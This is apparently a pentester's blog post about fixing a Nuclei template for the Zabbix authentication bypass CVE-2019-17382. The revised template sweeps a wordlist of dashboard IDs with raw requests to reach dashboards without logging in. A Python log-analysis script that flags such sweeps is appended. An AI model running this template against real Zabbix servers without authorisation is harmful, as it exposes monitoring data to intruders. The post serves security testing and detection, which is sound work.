Doing traditional pentesting is still fun (the real kind, not the "you have a vulnerable version of XYZ software and, sorry, there is no evidence of exploitation nor a PoC" kind).
One of the latest ones I did led me to make a small contribution to Nuclei Templates, yes, pure YAML.
A teammate noticed that the Zabbix installation on one target was vulnerable to an authentication bypass. It is a well-known vulnerability, so I wanted to know whether there was a Nuclei template for it, and yes, there was one. However, Nuclei with this template couldn't find the vulnerability.
The CVE-2019-17382.yaml template had a request like this:
requests:
  - method: GET
    path:
      - '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
The problem is that dashboards can be deleted and the ID then changes: on several installations there is no dashboardid=1 at all, but maybe 2, 12 or any other value.
So the new version of the request uses a payload (in this case a file with a list of possible IDs) and switches to a raw request:
requests:
  - payloads:
      ids: helpers/wordlists/numbers.txt
    attack: sniper
    threads: 50
    raw:
      - |
        GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
        Accept-Language: en-US,en;q=0.9
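On the receiving end, the sniper payload above shows up as a burst of dashboard.view requests with many different dashboardid values from one client. As an added example (not from this post or the Nuclei project), this Python script flags that pattern in web-server access logs; the combined log format, the sample IPs and log lines, and the window/threshold values are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

# Combined log format (assumed): client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample lines: one client walks dashboardid 1..12 within seconds (the
# sweep pattern), another legitimately views two dashboards a minute apart.
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Mar/2021:10:00:{s:02d} +0000] '
    f'"GET /zabbix.php?action=dashboard.view&dashboardid={i} HTTP/1.1" 200 5120'
    for s, i in enumerate(range(1, 13))
] + [
    '198.51.100.4 - - [10/Mar/2021:10:05:00 +0000] '
    '"GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [10/Mar/2021:10:06:00 +0000] '
    '"GET /zabbix.php?action=dashboard.view&dashboardid=2 HTTP/1.1" 200 5120',
]

def parse_line(line):
    """Return (ip, timestamp, dashboardid) for a dashboard.view hit, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("path"))
    qs = parse_qs(url.query)
    if url.path != "/zabbix.php" or qs.get("action") != ["dashboard.view"] or "dashboardid" not in qs:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT), qs["dashboardid"][0]

def find_dashboard_sweeps(lines, window=timedelta(seconds=60), min_ids=10):
    """Map client IP -> distinct dashboard IDs requested inside one `window`, for clients
    reaching `min_ids` distinct IDs (a user flips between a few; a sweep walks dozens)."""
    hits = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        hits[rec[0]].append((rec[1], rec[2]))
    flagged = {}
    for ip, events in hits.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ids = {d for t, d in events[i:] if t - t0 <= window}
            if len(ids) >= min_ids:
                flagged[ip] = ids
                break
    return flagged
```

Tune `window` and `min_ids` to how many dashboards your users actually have; the sweep is distinctive because the IDs are consecutive and arrive faster than any human clicks.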